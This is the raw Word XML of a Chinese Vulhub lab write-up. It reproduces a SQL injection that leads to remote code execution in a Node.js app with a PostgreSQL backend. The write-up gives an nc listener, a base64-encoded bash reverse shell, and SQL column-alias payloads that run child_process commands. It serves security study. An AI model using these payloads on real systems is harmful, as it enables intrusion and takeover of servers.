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DD8" w:rsidRPr="005B1A19" w:rsidRDefault="005B1A19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1A19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1A19" w:rsidRDefault="005B1A19">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、Vul</w:t>
      </w:r>
      <w:r>
        <w:t>hub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00536135" w:rsidRDefault="0053613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1778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135" w:rsidRPr="00536135" w:rsidRDefault="00536135" w:rsidP="00536135">
                            <w:r w:rsidRPr="00536135">
                              <w:t>docker-compose build</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00536135" w:rsidRDefault="00536135" w:rsidP="00536135">
                            <w:r w:rsidRPr="00536135">
                              <w:t>docker-compose up -d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AIDNe8NgIAAEg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:rsidR="00536135" w:rsidRPr="00536135" w:rsidRDefault="00536135" w:rsidP="00536135">
                      <w:r w:rsidRPr="00536135">
                        <w:t>docker-compose build</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00536135" w:rsidRDefault="00536135" w:rsidP="00536135">
                      <w:r w:rsidRPr="00536135">
                        <w:t>docker-compose up -d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36135" w:rsidRDefault="00536135">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、访问3</w:t>
      </w:r>
      <w:r>
        <w:t>000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口下的参数i</w:t>
      </w:r>
      <w:r>
        <w:t>d=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即可看到i</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为1的用户信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1A19" w:rsidRDefault="00536135">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7113BBDB" wp14:editId="403CF018">
            <wp:extent cx="2219325" cy="1209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135" w:rsidRDefault="00536135">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B1A19" w:rsidRPr="005B1A19" w:rsidRDefault="005B1A19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1A19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1A19" w:rsidRDefault="00536135">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、用s</w:t>
      </w:r>
      <w:r>
        <w:t>qlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现此处存在注入点，且数据库为p</w:t>
      </w:r>
      <w:r>
        <w:t>ostgres</w:t>
      </w:r>
      <w:r w:rsidR="006B7A7E">
        <w:t>ql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7A7E" w:rsidRDefault="006B7A7E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0967D067" wp14:editId="7B7CFC51">
            <wp:extent cx="5274310" cy="1297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135" w:rsidRDefault="00536135">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、V</w:t>
      </w:r>
      <w:r>
        <w:t>PS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启端口监听</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00334650" w:rsidRDefault="0033465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2540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650" w:rsidRDefault="00334650">
                            <w:r>
                              <w:t>nc –lvnp 8888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DqV5DUNgIAAE0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:rsidR="00334650" w:rsidRDefault="00334650">
                      <w:r>
                        <w:t>nc –lvnp 8888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36135" w:rsidRDefault="00536135">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、编写反弹s</w:t>
      </w:r>
      <w:r>
        <w:t>hell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的P</w:t>
      </w:r>
      <w:r>
        <w:t>ayload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00334650" w:rsidRDefault="00334650">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5274310" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="21590" b="25400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650" w:rsidRDefault="00334650">
                            <w:r w:rsidRPr="00334650">
                              <w:t>echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTkuMC4xLzIxIDA+JjE=|base64 -d|bash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15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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00334650" w:rsidRDefault="00334650">
                      <w:r w:rsidRPr="00334650">
                        <w:t>echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTkuMC4xLzIxIDA+JjE=|base64 -d|bash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34650" w:rsidRDefault="00536135">
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00334650">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>适当分割（每段字符不超过6</w:t>
      </w:r>
      <w:r w:rsidR="00334650">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00334650">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符）后替换到如下p</w:t>
      </w:r>
      <w:r w:rsidR="00334650">
        <w:t>ayload</w:t>
      </w:r>
      <w:r w:rsidR="00334650">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00334650" w:rsidRDefault="0033465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274310" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="21590" b="10160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650" w:rsidRDefault="00334650">
                            <w:r w:rsidRPr="00334650">
                              <w:t>SELECT 1 AS "\']=0;require=process.mainModule.constructor._load;/*", 2 AS "*/p=require(`child_process`);/*", 3 AS "*/p.exec(`echo YmFzaCAtaSA+JiAvZGV2L3Rj`+/*", 4 AS "*/`cC8xNzIuMTkuMC4xLzIxIDA+JjE=|base64 -d|bash`)//"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15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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00334650" w:rsidRDefault="00334650">
                      <w:r w:rsidRPr="00334650">
                        <w:t>SELECT 1 AS "\']=0;require=process.mainModule.constructor._load;/*", 2 AS "*/p=require(`child_process`);/*", 3 AS "*/p.exec(`echo YmFzaCAtaSA+JiAvZGV2L3Rj`+/*", 4 AS "*/`cC8xNzIuMTkuMC4xLzIxIDA+JjE=|base64 -d|bash`)//"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36135" w:rsidRDefault="00334650">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5、</w:t>
      </w:r>
      <w:r w:rsidR="00536135">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将上述p</w:t>
      </w:r>
      <w:r w:rsidR="00536135">
        <w:t>ayload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行u</w:t>
      </w:r>
      <w:r>
        <w:t>rl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，放在id</w:t>
      </w:r>
      <w:r>
        <w:t>=1;</w:t>
      </w:r>
      <w:r w:rsidR="00536135">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后发送</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00334650" w:rsidRPr="00334650" w:rsidRDefault="0033465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C2169E" wp14:editId="55842997">
            <wp:extent cx="5274310" cy="41567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135" w:rsidRDefault="00334650">
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00536135">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、V</w:t>
      </w:r>
      <w:r w:rsidR="00536135">
        <w:t>PS</w:t>
      </w:r>
      <w:r w:rsidR="00536135">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功接收到</w:t>
      </w:r>
      <w:r w:rsidR="00536135">
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00334650" w:rsidRPr="00536135" w:rsidRDefault="00334650">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6204D5CC" wp14:editId="1B522871">
            <wp:extent cx="5274310" cy="11950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50" w:rsidRPr="00536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F52" w:rsidRDefault="00E54F52" w:rsidP="005B1A19">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00E54F52" w:rsidRDefault="00E54F52" w:rsidP="005B1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F52" w:rsidRDefault="00E54F52" w:rsidP="005B1A19">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00E54F52" w:rsidRDefault="00E54F52" w:rsidP="005B1A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71E"/>
    <w:rsid w:val="0000671E"/>
    <w:rsid w:val="000C7CD9"/>
    <w:rsid w:val="00334650"/>
    <w:rsid w:val="00402DD8"/>
    <w:rsid w:val="00536135"/>
    <w:rsid w:val="005B1A19"/>
    <w:rsid w:val="006B7A7E"/>
    <w:rsid w:val="00E5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D65D1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AA4A0A42-68BD-495C-B76F-5E5BA1E3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1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1A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1A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1A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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-28T05:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-28T10:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>